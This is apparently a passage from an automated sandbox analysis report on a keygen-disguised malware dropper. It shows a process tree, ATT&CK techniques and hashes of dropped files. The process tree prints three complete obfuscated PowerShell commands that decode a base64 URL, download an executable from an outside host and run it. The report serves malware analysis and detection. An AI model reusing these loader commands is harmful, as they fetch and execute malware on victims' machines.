              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1012
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1112
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1308
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2000
              • C:\Users\Public\dpk.exe
                "C:\Users\Public\dpk.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2352
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2400
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2424
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2508
                • C:\Users\Public\dpk.exe
                  "C:\Users\Public\dpk.exe"
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:2472
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 896
                    7⤵
                    • Loads dropped DLL
                    • Program crash
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2876
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A78.tmp\ba1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1472
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1972

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Credential Access

      Credentials in Files

      2
      T1081

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Collection

      Data from Local System

      2
      T1005

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\mozglue.dll
      • C:\ProgramData\msvcp140.dll
      • C:\ProgramData\nss3.dll
        MD5

        bfac4e3c5908856ba17d41edcd455a51

        SHA1

        8eec7e888767aa9e4cca8ff246eb2aacb9170428

        SHA256

        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

        SHA512

        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
        MD5

        5e3c7184a75d42dda1a83606a45001d8

        SHA1

        94ca15637721d88f30eb4b6220b805c5be0360ed

        SHA256

        8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

        SHA512

        fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
        MD5

        a725bb9fafcf91f3c6b7861a2bde6db2

        SHA1

        8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

        SHA256

        51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

        SHA512

        1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_24b07af3-abd0-4a5c-a7dc-3a0167cfa627
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
        MD5

        75a8da7754349b38d64c87c938545b1b

        SHA1

        5c28c257d51f1c1587e29164cc03ea880c21b417

        SHA256

        bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

        SHA512

        798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d2f7a61-d10c-415e-9ef8-dfea47aa89bd
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
        MD5

        02ff38ac870de39782aeee04d7b48231

        SHA1

        0390d39fa216c9b0ecdb38238304e518fb2b5095

        SHA256

        fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

        SHA512

        24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
        MD5

        b6d38f250ccc9003dd70efd3b778117f

        SHA1

        d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

        SHA256

        4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

        SHA512

        67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
        MD5

        597009ea0430a463753e0f5b1d1a249e

        SHA1

        4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

        SHA256

        3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

        SHA512

        5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
        MD5

        df44874327d79bd75e4264cb8dc01811

        SHA1

        1396b06debed65ea93c24998d244edebd3c0209d

        SHA256

        55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

        SHA512

        95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
        MD5

        be4d72095faf84233ac17b94744f7084

        SHA1

        cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

        SHA256

        b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

        SHA512

        43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        42c1e51cbb5ed3c0154eec92dc61b313

        SHA1

        17083437fd82ab51782394742aec4b300c14e2dc

        SHA256

        6d781c5246d773a017bc5e10c7f74b7ad097ddf49e8d49042b2c7a2297e0d29b

        SHA512

        6c71dfc0a6f1ab64c3c4f3d81f097628421dc0c46b8245d9a60e60e98ef39321deaa6cbe488232560f60101e98c258d24e082c4ac0b46aa5418751bb52c35f85

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        8f7b7dbdf80a18d499cfeadd334dd91d

        SHA1

        372c4d16409b6b3378720aa9ba877717ffa4b7b9

        SHA256

        49d43536c2274710fc555c9618fdb289e58ee7f35e002018e7908db01322402c

        SHA512

        0fd74f7f4b4fc1f8f9491e024342e5783e9a09dc58acd60c07a9a62d8f6827cef66daf8579c757a4c8b7e673dda54d08ff99129a766f2db8496831fe8d2246a2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        04d39528da3d860882c8f5deeb6c578c

        SHA1

        7fe922f6cb9fb348b9acaa2becec14e65435825d

        SHA256

        90d68e44afa50658ec86734ff36a24b5d3409531c66d21a183a4f4e05193aea8

        SHA512

        82ce5ba666f9ba69f87ac81780dce6a8d293e24f47ebb4ff7ed13f22000cf9117ac376612cda54cc032a120de4790a4ec3bbd6940a4c526ec475312d0e5fa0fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        2a02c003772a9f40a3d9aae4da07bad8

        SHA1

        93efb3e4338d989886a19e579d2275a8de03d695

        SHA256

        51892eda8bdf0b341b3cf3770b3cd92ea0cb28597fc7759a28cef62b706aa398

        SHA512

        01eeb9c8b2919bd68b7e4122f20225aa871ba1b82e8f96f6dfd0c4ddae03979a177aadc089bfbdfd56145e01bb1557bcdda8ff5014f737fe1515edf7a390e37a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        2a02c003772a9f40a3d9aae4da07bad8

        SHA1

        93efb3e4338d989886a19e579d2275a8de03d695

        SHA256

        51892eda8bdf0b341b3cf3770b3cd92ea0cb28597fc7759a28cef62b706aa398

        SHA512

        01eeb9c8b2919bd68b7e4122f20225aa871ba1b82e8f96f6dfd0c4ddae03979a177aadc089bfbdfd56145e01bb1557bcdda8ff5014f737fe1515edf7a390e37a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        3d13cc74b2af5106b8714dea58f097a8

        SHA1

        af61750fe40d0497b4bfa8da12971628a623171a

        SHA256

        9ad56aa1e754acc1699e523701dc35b74a49c05e6deccb1a16dc03b30bab3c58

        SHA512

        7e7603af874b5964fbbeeb915350e4c4a8367e39dbfc44d317b2125e1836f18ef8bb8b3c64b1d928277ecb8d3d3c6fc7c68bfb5cfb9d29e11a19ef845002bd6f

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\Keygen.exe
        MD5

        ea2c982c12fbec5f145948b658da1691

        SHA1

        d17baf0b8f782934da0c686f2e87f019643be458

        SHA256

        eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

        SHA512

        1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\Keygen.exe
        MD5

        ea2c982c12fbec5f145948b658da1691

        SHA1

        d17baf0b8f782934da0c686f2e87f019643be458

        SHA256

        eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

        SHA512

        1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\b.hta
        MD5

        5bbba448146acc4530b38017be801e2e

        SHA1

        8c553a7d3492800b630fc7d65a041ae2d466fb36

        SHA256

        96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

        SHA512

        48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\b1.hta
        MD5

        c57770e25dd4e35b027ed001d9f804c2

        SHA1

        408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

        SHA256

        bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

        SHA512

        ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\ba.hta
        MD5

        b762ca68ba25be53780beb13939870b2

        SHA1

        1780ee68efd4e26ce1639c6839c7d969f0137bfd

        SHA256

        c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

        SHA512

        f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\ba1.hta
        MD5

        a2ea849e5e5048a5eacd872a5d17aba5

        SHA1

        65acf25bb62840fd126bf8adca3bb8814226e30f

        SHA256

        0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c

        SHA512

        d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\m.hta
        MD5

        9383fc3f57fa2cea100b103c7fd9ea7c

        SHA1

        84ea6c1913752cb744e061ff2a682d9fe4039a37

        SHA256

        831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d

        SHA512

        16eda09f6948742933b6504bc96eb4110952e95c4be752e12732cb3b92db64daa7a7a0312ca78ff1ceb7cffd7bd8a7d46514226fc3cea375b4edb02a98422600

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\m1.hta
        MD5

        5eb75e90380d454828522ed546ea3cb7

        SHA1

        45c89f292d035367aeb2ddeb3110387a772c8a49

        SHA256

        dd43305abbbe5b6cc4ab375b6b0c9f8667967c35bb1f6fefb0f1a59c7c73bd5e

        SHA512

        0670ef4f687c4814125826b996d10f6dd8a1dd328e04b9c436ee657486b27b1eefad5b82dcc25bd239d36b7ac488f98e5adcff56c5e82f7d0ed41f03301947c4

      • C:\Users\Admin\AppData\Local\Temp\4A78.tmp\start.bat
        MD5

        68d86e419dd970356532f1fbcb15cb11

        SHA1

        e9ef9a9d047f1076ba2afbe4eabec2ea2338fb0a

        SHA256

        d150a28b978b2d92caac25ee0a805dec96381471702a97f1099707b8538c6cbe

        SHA512

        3078c8c33b18ca1aa3bb2f812e5f587f5b081a4bd857f942ab382383faf09dbe8af38054546bf49037b79081c9406dc25647ae5bd843abc8fcca25c7b3afae14

      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
        MD5

        385e5b97d97b89cacff3594eafeb0e5e

        SHA1

        70e73110860c36c83c504f4804e3cebde2a618a1

        SHA256

        7b02ca9b842110100cd0471c27498b46a2542507ffaee32086bdfa4fd9c736b3

        SHA512

        f83f175846b8b674e140fff442ba8958bceb63fba2cdc2ab6c2b1e047e6c0d22c3f0ce36c9fcf44c7f744099a44fe9f497494d4e2eb47579af133c1b3dc20d83

      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
        MD5

        35bccedd18360d94a33d86c09af8480c

        SHA1

        013ab842c5b2ded0a930fc3d4f59a13d3ff66dc0

        SHA256

        ede4a3065bf86d3c92312a291f9776c231f728a32d59dcb1621bee320855ad9f

        SHA512

        31611f22f437bd12a4536eab643f0bf06070c5fbaedae27fc0117f1a4afca1b52d2fbc16e1a77587a4d069448bf8f158c8bbff46cfefc5bc9eccafe5421abd6f

      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        b604fb1d60b326888a213e1e5dce6aa0

        SHA1

        b5c3ffd0ac24e9c4e62afc1556c11f08ec2fe8a6

        SHA256

        d9fd6bbb4b5ae6b138c133dd63e3dbcd9713f26dc63cb6b14b1383004e71d5ea

        SHA512

        fb35b4347d5949468cc179381ce0d1deea7509824aec7ec9e1fa246df79df0744215952628eea860e008b8c2d08e590446a31364dd3537f6c6f4dc8a9794d961

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        b604fb1d60b326888a213e1e5dce6aa0

        SHA1

        b5c3ffd0ac24e9c4e62afc1556c11f08ec2fe8a6

        SHA256

        d9fd6bbb4b5ae6b138c133dd63e3dbcd9713f26dc63cb6b14b1383004e71d5ea

        SHA512

        fb35b4347d5949468cc179381ce0d1deea7509824aec7ec9e1fa246df79df0744215952628eea860e008b8c2d08e590446a31364dd3537f6c6f4dc8a9794d961

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        b604fb1d60b326888a213e1e5dce6aa0

        SHA1

        b5c3ffd0ac24e9c4e62afc1556c11f08ec2fe8a6

        SHA256

        d9fd6bbb4b5ae6b138c133dd63e3dbcd9713f26dc63cb6b14b1383004e71d5ea

        SHA512

        fb35b4347d5949468cc179381ce0d1deea7509824aec7ec9e1fa246df79df0744215952628eea860e008b8c2d08e590446a31364dd3537f6c6f4dc8a9794d961

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        b604fb1d60b326888a213e1e5dce6aa0

        SHA1

        b5c3ffd0ac24e9c4e62afc1556c11f08ec2fe8a6

        SHA256

        d9fd6bbb4b5ae6b138c133dd63e3dbcd9713f26dc63cb6b14b1383004e71d5ea

        SHA512

